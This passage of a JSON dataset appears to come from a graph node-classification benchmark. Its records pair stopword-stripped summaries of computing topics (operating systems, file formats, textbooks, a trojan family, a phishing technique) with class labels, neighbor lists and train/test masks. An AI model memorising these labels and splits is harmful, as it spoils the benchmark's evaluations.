programs via easy-to-use application programming interface extended include clusters single powerful pcs hierarchically propagate work one desktop grid lpds participated national international grid cloud research projects since 2000 outstanding results area grid/cloud resources development high-level user interfaces field important result ws-pgrade/guse used several european grid made access grid cloud systems portal convenient user-friendly way additionally lpds participates big data management storage within field agricultural research ongoing projects participation lpds laboratory maintains comprehensive list projects lpds played active role providing grid cloud trainings europe worldwide national international trainings laboratory provides knowledge transfer targets new users industry well science lpds organized hosted summer schools trainings grid- cloud-related topics since 2005 head lpds prof. dr. péter kacsuk deputy head lpds dr. robert lovas 1 dsc 10 phds 20 full part-time members work laboratory english hungarian",
    "neighbors": [
      4194,
      5956,
      8420,
      8912,
      8370,
      5654,
      4510
    ],
    "mask": "Train"
  },
  {
    "node_id": 6043,
    "label": 4,
    "text": "Data_Security_Threats_Database:data security threats database data security threats database bdu russian federation national vulnerability database maintained russian federal service technical export control 2018 bdu contained roughly one-tenth number entries corresponding u.s. national vulnerability database",
    "neighbors": [
      2558,
      4626,
      2446,
      575
    ],
    "mask": "None"
  },
  {
    "node_id": 6044,
    "label": 2,
    "text": "Whitix:whitix whitix desktop computer operating system written scratch x86 architecture matthew whitworth others project aims combine proven system technology unix-like kernel offering consistent clear interface new way navigate desktop operating system runs custom open source kernel written whitworth new features include icfs dynamic configuration filesystem replaces ioctl modular kernel whitix licensed gnu general public license fully preemptive multitasking kernel multithreading supports number filesystems including fat family filesystems ext3 journaling reiserfs iso9660 whitix available live cd download installed hard drive beginning version 0.2 userspace comprises native shell burn text editor fruity range ported applications c-based bsd-licensed software development kit available bindings various languages whitix contains posix compatibility library codice_1 aim full posix compliance whitix windowing environment xynth lightweight windowing environment developed alper akcan custom userspace software whitix consists range third party applications burn non-posix shell fruity simple text editor several filesystem utilities software ported whitix includes mono runtime environment c compiler python gnu compiler collection lua mplayer ports operating system self-hosting since october 2008 built gnu build chain 0.3 port gtk several linux applications planned whitix also adopts centralized approach userland configuration similar windows registry although widely used whitix software moment includes settings operating system software also linked whitix package management system currently development whitix supports several programming languages using utilities ported operating systems common collection utilities building whitix applications operating system programs found within gnu toolchain includes gnu compiler collection gcc gnu build system amongst others gcc provides compilers ada c c++ fortran whitix kernel designed built gcc ports languages python lua dynamic languages available ports .net languages also supported mono ported platform applications planned blaze platform built managed code development team issue releases ready however versions whitix declared stable general use latest release 0.2b released 1 march 2009 timing release depends stability features planned included although monthly release pattern minor versions improvements aim developers whitix.org",
    "neighbors": [
      5413,
      2345,
      4777,
      428,
      7983,
      9335,
      499,
      5363,
      3197,
      3573,
      2199,
      3960,
      5397,
      2045,
      1150
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6045,
    "label": 4,
    "text": "In-session_phishing:in-session phishing in-session phishing form potential phishing attack relies one web browsing session able detect presence another session visit online banking website web browser launch pop-up window pretends opened targeted session pop-up window user believes part targeted session used steal user data way phishing attacks advantage in-session phishing attacker need targeted website compromised way relying instead combination data leakage within web browser capacity web browsers run active content ability modern web browsers support one session time social engineering user technique exploited vulnerability javascript handling major browsers found amit klein cto security vendor trusteer ltd subsequent security updates browsers may made technique impossible",
    "neighbors": [
      2611,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 6046,
    "label": 7,
    "text": "Ntractive:ntractive ntractive privately held software development company based grand forks north dakota marketed business software small medium-sized companies established 2006 company main product elements crm mac crm customer relationship management application aimed small business use mac os x computers ipads iphones. elements crm cloud computing web application employed unique site-specific browser merge desktop web application functionality product first introduced public keynote address apple 2007 world wide developer conference official launch elements sbm products original name 1.0 took place macworld 2009 product renamed elements crm 2.0 release awarded honor apple staff pick july 2009 architecture overall development elements crm product line initially began 2003 company founder justin bartak company later founded january 2006 justin bartak dale jensen company specializing cloud computing mac crm customer relationship management apple hardware devices company elements crm platform part desktop part cloud powered webkit company ceased operations end 2016 mac customer relationship management mac crm approach managing company ’ interaction current future customers apple inc desktop computers ios devices mac crm solutions web-based applications use web browser interaction instead mac crm combination cloud based app built apple programming language objective-c swift programming language mac crms involve using apple devices technology organize automate synchronize sales marketing customer service technical support elements crm mac customer relationship management mac crm solution apple business offered subscription-based service elements crm part desktop part cloud main functions include managing leads contact information tracking communication history managing tasks follow ups tracking email communication creating estimates invoices managing projects elements crm ios universal mobile app iphone ipad ipad mini elements crm ios add-on elements crm desktop app ipad crm version elements crm ios looks works feels like desktop app iphone crm app limited version important functions desktop app elements crm mail email tracking tool works conjunction elements crm monitors user email server communication leads clients stored elements crm match found copy email stored elements crm within client record",
    "neighbors": [
      4194,
      2950,
      10470,
      1300,
      7292,
      4190
    ],
    "mask": "Test"
  },
  {
    "node_id": 6047,
    "label": 9,
    "text": "Structure_and_Interpretation_of_Computer_Programs:structure interpretation computer programs structure interpretation computer programs sicp computer science textbook massachusetts institute technology mit professors harold abelson gerald jay sussman julie sussman known wizard book hacker culture teaches fundamental principles computer programming including recursion abstraction modularity programming language design implementation mit press published first edition 1985 second edition 1996 formerly used textbook mit introductory course electrical engineering computer science sicp focuses discovering general patterns solving specific problems building software systems make use patterns book describes computer science concepts using scheme dialect lisp also uses virtual register machine assembler implement lisp interpreters compilers several fictional characters appear book book licensed creative commons attribution sharealike 4.0 license book used textbook mit former introductory programming course 6.001 course replaced 6.0001 uses python schools also made use book course textbook used textbook mit large scale symbolic systems class 6.945 byte recommended sicp professional programmers really interested profession magazine said book easy read would expose experienced programmers old new topics sicp influential computer science education several later books inspired style",
    "neighbors": [
      10752,
      5635,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10324,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      1159,
      9865,
      9877,
      5783,
      5803,
      2225,
      7867,
      4799,
      10435,
      7880,
      8908,
      205,
      5837,
      219,
      5852,
      4830,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      5880,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      10510,
      1301,
      10012,
      3869,
      2335,
      8479,
      2849,
      9002,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      8554,
      3446,
      10104,
      377,
      4992,
      7562,
      2964,
      6556,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      5585,
      11218,
      10712,
      3034,
      477,
      3051,
      5611,
      9714,
      7670,
      11255
    ],
    "mask": "None"
  },
  {
    "node_id": 6048,
    "label": 2,
    "text": "Label_(Mac_OS):label mac os labels macintosh operating systems type seven distinct colored parameters metadata attributed files folders disks operating system labels introduced system 7 kept release mac os 9 mac os x versions 10.0 10.2 lacked attribute reintroduced mac os x version 10.3 though without criticism labels macos let user give colored backgrounds system items three different types views action menu applicable selected icon older classic mac os versions choice color would cause icon completely wash color losing distinct traits process new label feature applies color background file names labeled item selected macos column view colored dot name indicates label choice seven colors easily exchanged colors names colors however changed represent categories assigned label colors label colors names customized classic mac os systems however mac os 8 9 provided functionality labels tab finder preferences dialog system 7 provided separate labels control panel labels mac os 9 earlier specific individual install booting another install another mac different disk would show different colors names unless set identically",
    "neighbors": [
      576,
      11171,
      9700,
      1542,
      713,
      6377,
      9035,
      4844,
      3598,
      5520,
      8114,
      5619,
      213,
      1592,
      7163,
      3324,
      11037,
      3167
    ],
    "mask": "None"
  },
  {
    "node_id": 6049,
    "label": 3,
    "text": "OpenIndiana:openindiana openindiana free open-source unix operating system derived opensolaris based illumos developers forked opensolaris oracle corporation discontinued order continue development distribution source code openindiana project stewarded illumos foundation also stewards illumos operating system openindiana developers strive make de facto opensolaris distribution production servers security bug fixes required free charge project indiana originally conceived sun microsystems construct binary distribution around opensolaris source code base openindiana conceived negotiations takeover sun microsystems oracle proceeding order ensure continued availability development opensolaris-based os widely used uncertainty among opensolaris development community led developers form tentative plans fork existing codebase plans came fruition following announcement discontinuation support opensolaris project oracle formal announcement openindiana project made september 14 2010 jisc centre london first release operating system made available publicly time despite untested reason untested release openindiana team set launch date ahead oracle openworld order beat release solaris 11 express announcement openindiana met mainly positive response 350 people viewed online announcement iso image downloaded 2000 times twitter account obtained 500 followers numerous notable press websites wrote release broadcast bandwidth announcement substantial noted top 350mbit/second network package depot server experienced 20x much traffic interested distribution originally planned resulting threads later provisioned reporting positive online articles questioned relevance solaris given market penetration linux one article critical openindiana launch citing lack professionalism regard releasing untested build project lack commitment release schedule initial openindiana release advertised experimental directly based latest opensolaris development build preliminary opensolaris 2010 release opensolaris binary distribution moved solarisexpress real-time feed opensolaris updates discontinued concerns abounded would happen openindiana oracle decided stop feeding source code back community openindiana team mitigated concerns announced intention move source code feed illumos foundation concerns raised possible discontinuation free access oracle-owned compiler used produce openindiana response openindiana modified able compile open source gnu compiler collection hcl hardware compatibility list remains somewhat informal fragmented un-centralized requiring much end-user research hardware selection lack comprehensive centralized hcl follows fact opensolaris hcl hosted oracle server infrastructure server-side code device driver utility submission made available august 2012 founding project lead alasdair lumsden stepped project citing personal reasons frustration lack progress made project among reasons lack progress lack developers resources resignation lumsden wrote many us first open source project ever contributed included task hand vast ill equipped deal since resignation project developed team volunteers completely horizontal participative community effort september 2013 distrowatch review stated openindiana project seemingly steady decline last couple years review concluded openindiana progressed significantly state opensolaris five years may 2015 distrowatch review openindiana similarly concluded little major progress made system years review stated package selection hardware support seemed lag behind systems many system administration features either replicated ported linux bsd review concludes claims lack package support may mitigated fact 3500+ software packages provided openindiana hipster split several packages would artificially increase package count e.g like linux distributions image packaging system file-based package management providing incremental updates package facets making splitting unnecessary burden course first two years existence hipster project migrated updated 1500 packages maintains collection selected software packages relying third-party repositories like sfe add-ons extended selection pkgsrc system supported joyent readily provides 20000+ packages illumos systems openindiana fork technical sense continuation opensolaris spirit project intends deliver system v family operating system binary-compatible oracle products solaris 11 solaris 11 express however rather based os/net consolidation like opensolaris openindiana based illumos project use image packaging system ips package management system opensolaris openindiana codebase initially based majority publicly available code oracle case since oi_151a development builds based illumos september 2011 onwards project effectively moved away oracle-owned tools sun studio builds since 2013 including active hipster branch use gnu compiler collection gcc sole compiler illumos project built gcc since june 15 2012 first experimental release openindiana build 147 released september 14 2010 second experimental release build 148 released december 17 2010 first development release build 151 released september 14 2011 first release based upon illumos martux 151a0 released first sparc build openindiana build 151a7 intel/amd architectures released october 6 2012 build 151a8 released august 10 2013 opensxce 2013.01 sparc build 151a formerly martux released openindiana february 1 2013 second possibly last openindiana sparc build subsequent releases based upon dilos since development model inherited opensolaris project unsuitable community project hipster initiative created late 2013 reboot modernize openindiana hipster project fast development branch openindiana based rolling-release model horizontal contribution scheme oi-userland build system use continuous integration hipster actively maintained repository receives software updates well security fixes installation images published twice year every snapshot release announced via mailing list twitter first snapshot release delivered february 14 2014 subsequent snapshots based six-month development cycle notable features hipster list features updated development cycle roadmap page issue tracker",
    "neighbors": [
      2179,
      6787,
      6412,
      8077,
      1422,
      1813,
      5397,
      2967,
      1304,
      3487,
      5280,
      10016,
      3241,
      6445,
      8621,
      7983,
      3248,
      11184,
      2995,
      9141,
      823,
      9784,
      7483,
      6591,
      9151,
      9665,
      10436,
      8262,
      5067,
      463,
      5078,
      5335,
      8539,
      1632,
      6369,
      6371,
      11363,
      5356,
      366,
      8816,
      381,
      5363,
      5492,
      9842,
      9972,
      1399,
      2424,
      633,
      4858,
      11506,
      5240,
      2045,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 6050,
    "label": 3,
    "text": "ARM_Accredited_Engineer:arm accredited engineer arm accredited engineer aae program professional accreditations awarded arm holdings aae program designed computer software hardware engineers wishing validate knowledge arm technology program launched 2012 series events including arm techcon 2012 aae program consists number certifications syllabus assessed means separate one-hour multiple-choice exam aae program ended 2016 two accreditations currently available others launched next years http //ds.arm.com/developer-resources/arm-accredited-engineer-program/ aae entry-level accreditation first launched aae syllabus covers software-related aspects armv7 architecture specific focus cortex-a cortex-r profiles including applications processors real-time processors syllabus cover cortex-m systems aae certification aimed general embedded software systems developers broad knowledge arm technology syllabus covers following subject areas aame accreditation launched 16 september 2013 entry-level accreditation similar basic aae accreditation focused armv7 cortex-m profile accreditation aimed general embedded software engineers broad knowledge arm technology bias toward microcontrollers syllabus covers following subject areas following accreditations considered launch 2013 2016 aae program exams delivered prometric inc. supervised computer-based tests dedicated test platforms throughout network 10,000 authorized prometric test centers aptcs around world 70 multiple choice questions candidates given one hour complete test results issued instantly on-screen grades either pass fail letter percentage grades issued passing exam candidates also request paper certificate mailed",
    "neighbors": [
      9964,
      4773
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6051,
    "label": 4,
    "text": "David_Litchfield:david litchfield david litchfield born 1975 security expert united kingdom anne saita writing information security magazine called along brother mark litchfield world best bug hunters december 2003.also 2003 sister amelia litchfield born litchfield found hundreds vulnerabilities many popular products among outstanding discoveries products microsoft oracle ibm blackhat security briefings july 2002 presented exploit code demonstrate buffer overflow vulnerability discovered microsoft sql server 2000 six months later 25 january 2003 persons unknown used code template sql slammer worm several years vulnerability research litchfield made move oracle forensics documented perform forensic analysis compromised database server series white papers – oracle forensics parts 1 6 process researching developing open source tool called forensic examiner database scalpel f.e.d.s litchfield founded company named cerberus information security acquired stake july 2000 year half later founded next generation security software five colleagues stake author various software packages also many technical documents security issues author oracle hacker handbook co-author database hacker handbook shellcoder handbook sql server security also contributing author special ops david litchfield currently employed apple",
    "neighbors": [
      736,
      10340,
      5512,
      3704,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6052,
    "label": 0,
    "text": "Boris_Katz:boris katz boris katz born october 5 1947 chișinău moldavian ssr soviet union chișinău moldova principal american research scientist computer scientist mit computer science artificial intelligence laboratory massachusetts institute technology cambridge head laboratory infolab group research interests include natural language processing understanding machine learning intelligent information access brother victor kac mathematician mit able get ussr help u.s senator ted kennedy end cold war last several decades boris katz developing start natural language system allows user access various types information using english boris katz born october 5 1947 chișinău family hersh katz died 1976 hayki klara landman born 1921 lipcani briceni district died 2006 cambridge middlesex county moved lipcani town located northern bessarabian chișinău war graduated moscow state university november 1978 left united states thanks personal intervention senator edward m. kennedy defended thesis candidate physical mathematical sciences 1975 supervision evgenii m. landis currently lives boston heads infolabresearch team laboratory informatics artificial intelligence massachusetts institute technology boris katz creator start information processing system since 1993 internet author several works field processing generation perception natural languages machine learning accelerated access multimedia information brothers victor gershevich katz american mathematician professor massachusetts institute technology mikhail gershevich katz israeli mathematician graduate harvard columbia ph.d. 1984 universities professor bar-ilan university author monograph systolic geometry topology mathematical surveys monographs vol 137 american mathematical society providence 2007 daughter luba katz bioinformatics scientist husband alan jasanoff neuroimaging scientist professor mit son harvard university professors jay jasanoff sheila jasanoff",
    "neighbors": [
      7780,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 6053,
    "label": 3,
    "text": "Ring_King:ring king ring king known pal regions king boxer known japan arcade boxing game published 1985 data east north america woodplace inc. pal regions game continues series theme comical sports player takes role boxer makes way debut become world champion ring king though perhaps unintentionally standard boxing creations era via providing quirky monikers opponents player encounters arcade release number eight 8 violence jo entry level fighter champion nes version brown pants white wolf bomba vern beat brown blue warker reigning champion arcade version green hante onetta yank assuming player wins championship arcade play continues cycling last afore-listed three blue warker green hante onetta yank player choose several different types punches defensive maneuvers along unique special attacks player revives stamina round interval pressing button rapidly boxer abilities determined three different stats punch stamina speed player improve stats using power points gained match performing well matches allows player create powerful boxers player save game progress recording password two players face two-player mode though game rudimentary possible counter-punch missing many punches causes boxer stamina decrease biggest characteristic game comical set special attacks moves activated player presses attack button right timing right distance attacks capability instantly knock opponent countered special attack causes extraordinary amount damage well first special attack powerful hook boxer throws spinning around like top second straight punch propels opponent ropes connects third type uppercut launches opponent straight air thrown right timing uppercut blast opponent straight ring resulting technical knockout ring king sales surpassed 250,000 copies november 1989 game later ported nintendo entertainment system famicom japan 1987 published data east north america namco japan version also released vs. unisystem vs. tko boxing sony later ported msx2 exclusively japan 1988 famicom msx2 versions released third game family sports game series family stadium family jocky famicom japan namco game later converted i-mode mobile phone application released exclusively january 2004 namco",
    "neighbors": [
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 6054,
    "label": 4,
    "text": "Colin_Robbins_(software_engineer):colin robbins software engineer colin robbins born 1964 network protocol software engineer credited research work distributed directory systems co-inventor ldap educated alleyn school holds bsc computer science electronic engineering first class honours university college london robbins developed quipu directory part iso development environment isode research assistant ucl working peter kirstein became custodian isode marshall rose 1991 quipu used prototype dixie dased merged invent ldap robbins wrote string representation standard attribute syntaxes element defined rfcs 1448 1778 published ietf robbins wrote part 3 steve kille book implementing x.400 x.500 pp quipu systems robbins technical architect vice-chairman europe-wide nameflow paradise directory world ’ largest distributed deployment x.500 also led electronic messaging association ema world directory challenge received ema distinguished service award 1997 led european electronic messaging association eema security challenge robbins awarded eema personality year 1998 robbins chartered institute directors serving boards nexor information assurance advisory council iaac sponsor member co-chair information assurance collaboration group iacg 2012-2014 water polo coach vice-chair nottingham leander swimming club",
    "neighbors": [
      11456,
      6110,
      2359,
      6648,
      6651,
      10238
    ],
    "mask": "None"
  },
  {
    "node_id": 6055,
    "label": 2,
    "text": "Berry_Linux:berry linux berry linux live cd linux distribution english japanese support berry linux based compatible fedora 20 packages distribution primarily focused use live cd also installed live usb drive berry linux used try showcase linux educational purposes rescue system without need make changes hard disk current version 1.19 released berry includes read/write ntfs support aiglx beryl bundled 3d desktop effects berry also uses bootsplash giving graphical startup full version v1.12 includes runs linux kernel 3.0.4 alsa sound system acpi support selinux berry linux features automatic hardware detection support many graphics cards sound cards scsi usb devices many peripherals network devices automatically configured dhcp full version berry linux uses kde version 4.6.5 berry linux mini uses fluxbox window manager full version 512.7mb mini version 273.4mb test berry linux necessary install distribution hard disk operating system runs entirely cd-rom however possible install berry linux hard disk requires 1.7 gigabytes free space supporting japanese berry includes whiz sharp kana-kanji conversion system also comes libreoffice version 3.4.3 microsoft office compatible office suite well textmaker/planmaker berry office software gimp version 2.6.10 bundled graphics software berry includes media players audacious mplayer xine kaffeine dvd divx codecs installed default berry linux historical releases following",
    "neighbors": [
      5380,
      8837,
      7435,
      10127,
      2193,
      2321,
      5397,
      4887,
      10394,
      4637,
      673,
      3745,
      10530,
      9064,
      9253,
      10149,
      11305,
      7854,
      561,
      2738,
      4790,
      823,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      5067,
      8907,
      7375,
      1110,
      2134,
      9693,
      2914,
      6371,
      485,
      3685,
      5096,
      4841,
      6890,
      7913,
      6380,
      7020,
      5742,
      2671,
      7534,
      7920,
      8177,
      5363,
      9074,
      9461,
      10860,
      6393,
      11388,
      8957,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 6056,
    "label": 2,
    "text": "PRIMOS:primos primos operating system developed 1970s prime computer minicomputer systems rapidly gained popularity mid-1980s serious contender mainline minicomputer operating system advent pcs decline minicomputer industry prime forced market early 1990s end 2010 trademarks prime primos longer existed prime also offered customizable real-time os called rtos one feature primos like unix largely written high level language callable assembly language library functions available first language fortran iv odd choice pure computer science standpoint pointers if-then-else native string type etc fortran however language known engineers engineers big market prime early years unusual choice fortran os programming language people founded prime worked honeywell nasa project fortran language used nasa many mit honeywell time uninterested minicomputers left founded prime taking code developed hardware optimized run fortran including machine instructions directly implemented fortran distinctive 3-way branch operation since prime hardware perform byte addressing impetus create c compiler late models hardware eventually modified support i-mode programs compiled c. later around version 18 version pl/1 called pl/p became high level language choice within primos pl/p modula-2 languages used kernel furthermore new primos utilities written sp/l similar pl/p source code primos available customers thanks fortran pl/p customers could reasonably modify primos needed example around 1990 university salford uk modified primos running five 9955 systems undergraduates could longer use message command wrapped primos smsg call send messages undergraduates online chatting using command becoming rife tying terminals limited pool available messaging using command akin sms text messaging today except maximum 80 characters could sent per message early versions primos revision 6 originally called dos primos 2 later dosvm primos 3 starting primos 4 p400 system primos name stuck many major releases primos last official revision 24.0.0.r52 released july 3 1997 time company called peritus employed number ex-prime engineers maintaining primos revision 19 major portions primos written languages spl modula-2 usage prime macro assembler pma fortran iv pl/p declined considerably around time programs guaranteed run current prime processors subject sufficient resources available well subsequent prime processors versions primos ca 1977 later filesystem included distinctive construct known segment directory unlike traditional directories files anchored segment directory located using integer index effectively reducing searches directory simple hash function segment directories used keyed-index/direct access ki/da file access system later versions system loader indexed data could stored midas file multi-indexed data access system accessed via cobol fortran among third party tools package named queo powerful cobol despite less verbose primos character set basically ascii 8th bit inverted original 7-bit standard ascii left 8th bit unspecified commonly available teletype model 33 asr bit customarily set 1 became prime standard vital realize transferring data primos almost system time prime computer demise list languages supported primos included also available relatively uncommon late versions primos included scripting language cpl command processing language esri used basis platform-independent scripting languages aml arcinfo sml pc-arc/info step beyond already available via phantoms form unattended background processes immediately began run background initiated phantom command conventional batch jobs initiated via job command including ability schedule particular time primes main offerings covering specific need prime primenet software designed enable transparent access system network without burdening user extra commands primenet user system could access files system b system even log another system using rlogin remote login command released similar timing primenet 2780/3790 emulation included 1985 prime port unix system v called primix became available primos release 19.4.2 modified include unix functions co-existed primos allowing users switch back forth",
    "neighbors": [
      512,
      477,
      6529,
      2179,
      9751,
      11075,
      8262,
      7983,
      5714,
      2995,
      5363,
      6675,
      6772,
      8502,
      9780,
      7483,
      2045,
      6558
    ],
    "mask": "None"
  },
  {
    "node_id": 6057,
    "label": 2,
    "text": "Dalvik_Turbo_virtual_machine:dalvik turbo virtual machine dalvik turbo proprietary alternative google implementation dalvik virtual machine runs android operating system platforms developed french/swiss firm myriad group virtual machine runs java platform compatible mobile devices runs applications converted compact dalvik executable .dex format suitable systems constrained terms memory processor speed mips technologies/imagination technologies entered license agreement myriad make dalvik turbo virtual machine vm available licensees part standard distribution android mips architecture myriad claims applications run dalvik turbo three times faster reducing battery drain giving developers power need create graphically intense games dalvik turbo shown video 2.8 times faster running benchmark test",
    "neighbors": [
      4098,
      8711,
      8719,
      7700,
      4124,
      9244,
      11294,
      1578,
      5677,
      8237,
      1083,
      7234,
      6212,
      69,
      8262,
      10316,
      4685,
      3664,
      8280,
      8285,
      2658,
      6247,
      6250,
      6252,
      6253,
      6256,
      5237,
      9851,
      1670,
      8327,
      5262,
      10393,
      7835,
      673,
      8870,
      1191,
      196,
      8907,
      8413,
      9949,
      1255,
      8940,
      760,
      5892,
      7428,
      783,
      7445,
      280,
      10009,
      10525,
      798,
      288,
      8481,
      2852,
      8486,
      10537,
      7983,
      3380,
      823,
      5431,
      2875,
      3900,
      10045,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      2978,
      5028,
      1959,
      937,
      426,
      938,
      5546,
      7595,
      1480,
      2001,
      479,
      1516,
      5100,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6058,
    "label": 3,
    "text": "LibreELEC:libreelec libreelec short libre embedded linux entertainment center non-profit fork openelec open source software appliance enough linux distro kodi fork openelec announced march 2016 split openelec team creative differences taking active developers time join new libreelec project conservative fork openelec project stronger focus pre-release testing post-release change management",
    "neighbors": [
      1700,
      1674,
      5612,
      6380,
      6797,
      9806,
      3664,
      4432,
      7602,
      1107,
      4147,
      5363,
      5397,
      823,
      4219,
      8124
    ],
    "mask": "None"
  },
  {
    "node_id": 6059,
    "label": 4,
    "text": "Trojan.WinLNK.Agent:trojan.winlnk.agent trojan.winlnk.agent also trojan win32/startpage.os definition kaspersky labs trojan downloader trojan dropper trojan spy first known detection goes back may 31 2011 according microsoft malware protection center trojanware opens internet explorer browser predefined page like i.163vv.com/ 96 trojan files lnk extension expression windows shortcut malicious file program folder lnk file family launches malicious executable may dropped malware files mostly used worms spread via usb drives i.e",
    "neighbors": [
      7809,
      131,
      10756,
      1417,
      1994,
      10392,
      2041,
      858,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 6060,
    "label": 2,
    "text": "Remote_Data_Services:remote data services remote data services rds formerly known advanced data connector adc microsoft technology used conjunction activex data objects ado allowed retrieval set data database server client altered way sent back server processing popular adoption transact-sql extends sql programming constructs loops conditional statements became less necessary eventually deprecated microsoft data access components version 2.7 microsoft produced soap toolkit 2.0 allows clients via open xml-based standard",
    "neighbors": [
      736,
      8262,
      2183,
      8607,
      5225,
      10413,
      2901,
      10486,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 6061,
    "label": 9,
    "text": "Aspect_weaver:aspect weaver aspect weaver metaprogramming utility aspect-oriented languages designed take instructions specified aspects isolated representations significant concepts program generate final implementation code weaver integrates aspects locations specified software pre-compilation step merging aspects classes representations structure entities program weaver generates woven class aspect weavers take instructions known advice specified use pointcuts join points special segments code indicate methods handled aspect code implementation aspect specifies whether related code added throughout related methods aspect weavers improve modularity keeping code one place would otherwise interspersed throughout various unrelated classes many programming languages already widely accepted understood however desire create radically different programming languages support aspect-oriented programming paradigm significant due business-related concerns risks associated adopting new technologies use entirely new language relies business ability acquire new developers additionally existing code base business would need discarded finally business would need acquire new toolchain suite tools development often expense money time primary concerns roadmaps adoption new technologies tend need train new developers adapt existing processes new technology address business concerns aspect weaver enables use widely adopted languages like java aspect-oriented programming minor adaptations aspectj work existing tools instead developing entirely new language aspect weaver interprets extensions defined aspectj builds woven java code used existing java compiler ensures existing object oriented code still valid aspect-oriented code development feel like natural extension object-oriented language aspectc++ programming language extends c++ use aspect weaver offering additional efficiency aspectj necessary embedded systems still retaining benefits aspect-oriented programming aspect weavers operate taking instructions specified aspects known advice distributing throughout various classes program automatically result weaving process set classes names original classes additional code injected classes functions automatically advice specifies exact location functionality injected code weaving process aspect weavers allow code would otherwise duplicated across classes eliminating duplication aspect weavers promote modularity cross-cutting concerns aspects define implementation code would otherwise duplicated use pointcuts join points define advice weaving aspect weaver uses pointcuts join points known pointcut designator identify positions candidate classes implementation injected implementation injected classes points identified thus permitting code executed appropriate times without relying manual duplication programmer programming language aspectj pointcuts join points modularized code defined aspect block similar java classes classes defined using java syntax weaving process consists executing aspect advice produce set generated classes aspect implementation code woven example right shows potential implementation aspect logs entry exit methods without aspect weaver feature would necessitate duplication code class every method instead entry exit code defined solely within aspect aspect weaver analyzes advice specified pointcut aspect uses advice distribute implementation code defined class code differs slightly method due slight variances requirements method method identifier changed aspect weaver determines appropriate code generate situation defined implementation advice injects methods matching specified pointcut instead generating set woven source code aspectj weavers instead weave aspects classes together directly bytecode acting aspect weaver compiler expected performance aspect weavers also perform compilation process require computation time due weaving process involved however bytecode weaving process produces efficient runtime code would usually achieved compiled woven source developments aspectj revealed potential incorporate just-in-time compilation execution aspect-oriented code address performance demands run-time aspect weaver could translate aspects efficient manner traditional static weaving approaches using aspectj java virtual machine dynamic weaving aspects run-time shown improve code performance 26 implementations just-in-time virtual machines implement capability new virtual machine implementations designed use features already exist current virtual machines requirement new virtual machine contrary one original design goals aspectj accomplish just-in-time weaving change virtual machine executes compiled bytecode necessary proposed solution aspectj uses layered approach builds upon existing java virtual machine add support join point management callbacks dynamic aspect-oriented programming engine alternative implementation uses weaving engine uses breakpoints halt execution pointcut select appropriate method embed application continue use breakpoints manner shown reduce performance due large number context switches aspect weavers performance well performance code produce subject analysis preferable improvement modularity supplied aspect weaving impact run-time performance aspect weavers able perform aspect-specific optimizations traditional optimizations elimination unused special variables aspect code done compile-time optimizations performed aspect weaver example aspectj contains two similar distinct keywords codice_1 contains information particular instance woven code codice_2 contains information common instances code relevant set advice optimization replacing codice_1 efficient static keyword codice_2 done aspect weaver performing replacement woven program avoids creation join point object every execution studies shown unnecessary creation join point objects aspectj lead performance overhead 5 run-time performance degradation approximately 1 object created compile-time performance generally worse aspect weavers traditional compiler counterparts due additional work necessary locating methods match specified pointcuts study done showed aspectj compiler ajc 34 slower sun microsystems java 1.3 compiler 62 slower java 1.4 compiler",
    "neighbors": [
      1952,
      8609,
      9665,
      6403,
      8262,
      5896,
      5677,
      8173,
      2936,
      2556
    ],
    "mask": "None"
  },
  {
    "node_id": 6062,
    "label": 6,
    "text": "Universal_Disk_Format:universal disk format universal disk format udf profile specification known iso/iec 13346 ecma-167 open vendor-neutral file system computer data storage broad range media practice widely used dvds newer optical disc formats supplanting iso 9660 due design well suited incremental updates recordable writable optical media udf developed maintained optical storage technology association osta normally authoring software master udf file system batch process write optical media single pass packet writing rewritable media cd-rw udf allows files created deleted changed on-disc general-purpose filesystem would removable media like floppy disks flash drives also possible write-once media cd-r case space occupied deleted files reclaimed instead becomes inaccessible multi-session mastering also possible udf though implementations may unable read disks multiple sessions optical storage technology association standardized udf file system form common file system optical media read-only media re-writable optical media first standardized udf file system aimed replace iso 9660 allowing support read-only writable media release first version udf dvd consortium adopted official file system dvd-video dvd-audio multiple revisions udf released udf revisions internally encoded binary-coded decimals revision 2.60 example represented 0x0260 addition declaring revision compatibility volume defined minimum read minimum write revisions signalling requirements operations possible every structure image maximum write revision additionally records highest udf support level implementations written image example udf 2.01 volume use stream files introduced udf 2.00 uses vat udf 1.50 created udf 2.60-capable implementation may revision declared 0x0201 minimum read revision set 0x0150 minimum write 0x0150 maximum write 0x0260 udf standard defines three file system variations called builds introduced first version standard format used type disk allows random read/write access hard disks dvd+rw dvd-ram media metadata v2.50 file data addressed less directly writing disk format physical block disk may chosen allocation new updated files since basic format practically operating system file system driver claiming support udf able read format write-once media dvd-r cd-r limitations written physical block written writing must happen incrementally thus plain build udf written cd-rs pre-mastering data writing data one piece media similar way iso 9660 file system gets written cd media enable cd-r used virtually like hard disk whereby user add modify files cd-r so-called drive letter access windows osta added vat build udf standard revision 1.5 vat additional structure disc allows packet writing remapping physical blocks files data disc modified deleted write-once media entire disc virtualized making write-once nature transparent user disc treated way one would treat rewritable disc 